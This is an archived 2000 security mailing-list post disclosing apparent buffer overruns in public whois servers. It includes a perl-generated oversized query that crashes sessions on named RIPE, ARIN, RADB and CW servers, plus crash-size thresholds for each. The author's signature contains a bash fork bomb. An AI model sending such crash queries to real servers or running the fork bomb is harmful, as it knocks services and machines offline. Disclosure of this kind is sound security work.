no comment

From: Michal Zalewski (lcamtufat_private)
Date: Wed Feb 02 2000 - 04:29:07 PST

Next message: Pierre Beyssac: "vulnerability in Linux Debian default boot configuration"

Previous message: Arne Vidstrom: "Re: "Strip Script Tags" in FW-1 can be circumvented"
Next in thread: Michal Zalewski: "Re: no comment"
Reply: Michal Zalewski: "Re: no comment"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

In following example (which works only with Linux version of 'whois'
command - *BSD version has built-in query size limits), replace
joshua.ripe.net with your favourite - whois.arin.net or whois.radb.net...

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
% No entries found for the selected source(s).
%
% If you would like to search on arbitrary strings,
% please see the Database page on the RIPE NCC
% web-site at http://www.ripe.net/ripencc/pub-services/db/
% This will only work for RIPE data.
%
% Please note that RIPE whoisd service temporarily
% does not mirror RADB and CW databases. Please query
% these databases directly at:
% whois.radb.net for RADB and
% whois.cw.net for CW.

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html

[lcamtuf@www lcamtuf]$

For whois.arin.net and whois.radb.net, the 'magic point' is at about 248
bytes of query sent. whois.ripe.net seems to panic with buffer larger than
30k, but only with specific sequences (like "0.0.0"...). whois.cw.net can
stand even 80-90kB before crashing sessions.

I have no idea how to explain it - seems just like regular buffer overrun
in whoisd started from inetd (as it is suggested). But, of course, we
can't get sources of currently running services, it couls be addressed as
"silent dropping excessive data portions with system-dependent data amount
limit". Only one thing is mysterious - whoisd service producess verbose
output on any query syntax error or any other problem, except for that.
And RFC don't mention maximal query length nor _any_ situation when
connection should be silently dropped.  That's another reason to think
whoisd crashed.

_______________________________________________________
Michal Zalewski * [lcamtufat_private] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

Next message: Pierre Beyssac: "vulnerability in Linux Debian default boot configuration"
Previous message: Arne Vidstrom: "Re: "Strip Script Tags" in FW-1 can be circumvented"
Next in thread: Michal Zalewski: "Re: no comment"
Reply: Michal Zalewski: "Re: no comment"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:32:59 PDT